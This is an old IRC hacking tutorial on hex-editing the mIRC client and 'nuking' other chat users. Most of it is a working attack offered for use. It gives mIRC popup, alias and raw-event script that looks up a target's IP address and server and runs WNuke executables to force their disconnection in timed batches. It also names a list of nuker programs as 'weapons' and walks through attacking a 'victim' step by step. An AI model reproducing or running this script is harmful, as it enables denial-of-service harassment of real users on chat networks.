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|| How to Hexedit mIRC - Flood Protection/Nuking ||
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|| By: Lord Somer(webmaster@lordsomer.com) ||
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|| The Hackers Layer ||
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|| http://www.lordsomer.com ||
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Flood Protection
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1.Get Rid of Version/User Floods
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Using a hex editor open mIRC.exe.
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Search for Reply.
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Find where the replies are.
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Simply delete all the replys, except for the ping reply.
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How to Nuke
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There are several ways and versions of nukes but the most common is the simple wnuke nuke.
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It just disconnects the user from the server, so that's what a connection reset by peer
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means! I'll cover the wnukes first then the other types of nukes
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The 2 types of WNukes
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1.WNUKE 4 From a Popup Nuke
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Download WNUKE4.EXE
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Add these pieces of coding to the appropriate portions of mIRC.
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[POPUPS/NICK NAMES LIST]
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NUKE!:/mn $1 $2 $3 $4 $5 $6 $7
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[ALIASES]
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mn {
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.nuke $$1
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timer 1 3 /nuke $$2
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timer 1 6 /nuke $$3
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timer 1 9 /nuke $$4
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timer 1 12 /nuke $$5
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timer 1 15 /nuke $$6
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timer 1 18 /nuke $$7
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}
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/nuke {
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enable #nuke
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set %nuke.nick $1
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stats L $1
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whois $1
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timer 1 2 /src
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}
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[RAW]
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#nuke disabled
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311:*: set %nukeip $parm4 | halt
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312:*: set %nukeserver $parm3 | halt
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301:*: halt
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313:*: halt
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319:*: halt
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317:*: halt
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318:*: run $mircdir $+ \wnuke4.exe -n %nukeserver %nukeip 0 1200-3500 %nukeport | .disable #nuke | echo 6 Nuking %nukeip on %nukeserver %nukeport $+ . | halt
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#nuke end
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2.WNewk Via a Seperate Program
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1.Pick Your Weapon
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1.wnuke.exe
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2.wnuke2.exe
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3.wnuke4.exe RECOMMENDED
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4.dccnewk.exe
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5.pnewq97o.exe
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6.snuke.exe
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7.wnewk.exe
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8.wnewk-x.exe
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9.wnewk-x2.exe RECOMMENDED
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2.The below options refer to a bit of code and here it is:
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[POPUPS/NICKNAMES LIST]
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Nuke
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.DNS:/dns *1
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.Run Nuker:/run $mircdir $+ utils\nukers\wnewk-x2.exe
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.Whois:/whois *1
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This is based on the fact your nuker is in a sub-dir of utils called nukers.
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3.Run Your weapon of choice in this case wnewk-x2.exe or of course increase your
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script by adding in the bit of code.
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4.Now do a /dns on the enemy or you could add the bit of code to your script.
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5.Now do a /whois on the enemy or you could add the bit of code to your script.
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6.Look in your status window, highlight the outputted ip address and server
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of your victim and hit crtl+c(seperate copy for each, these are placed in the config more
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info in next step).
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7.Configure the script:
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Server: paste the server from the status window here
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Destination address: paste the ip of the victim from the status window here.
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Hit engage newk and watch in the channel for a:CONNECTION RESET BY PEER
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If it dosen't work increase the rang of ports, do a /links and pick a different
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server to try going through, or try a different unreach to use.
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